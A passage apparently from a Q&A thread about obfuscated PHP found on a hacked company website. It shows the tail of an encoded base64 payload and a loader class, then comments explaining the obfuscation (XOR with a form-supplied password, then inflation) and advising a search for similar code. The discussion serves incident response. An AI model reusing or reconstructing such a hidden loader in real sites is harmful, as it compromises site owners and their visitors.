    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
    VatIJOMW/mRERh2pg0jJbAx2wsY=";

    var $claster = "XY9BS8NAEIXvhf6HcQlsAkEtxVJJk4ssVDxEk+glSFjbrVnoZsPupNh/78R60Nxm5r355k3gT7KDFFjD
    4Br88OHRhWZ/FwZNKYo3UdR8W1XPzTYvK/4exXAbwzJK5jN9CLX3CslYiJdXUVY1b8wneSIIWt8S8x9t
    YvoBLVZRAuro1R/YQ54/PYo6GHMRaz77hU2UBGjnSpkez+HooKtO4eA6kM7JyywGvl4tlvdrPgZWu9YC
    3xysMyB3qG2XMgZGYWv3KeutR5ZtdNcPCHjuVcpQfSGDThqqKfREpeeMJv0kjwO1WUb6zQjPePIN";
}

new Foo();
?>
```

Comment: There is no such thing as `PHP byte-code` so it's just the hackers way to obfuscate their intentions. That you found the hack, next step: search all PHP scripts on company site for similar code. Specifically search for occurrences of `md5()`

Comment: If you unwrap all the function names you will see how the code is being obfuscated. If it was php code, it could have been decoded similar to the claster string. Something is being added to the memory’s stack

Comment: @SherifEweis the `x64` is xored with a password in the `dx` function before it's `gz_inflated`. The password is sent by the form in the first part you decoded. You need that pass (or find it out in some other way) to decode the second part.

Comment: @PawełŁukasik Thank you, this is the answer I was looking for.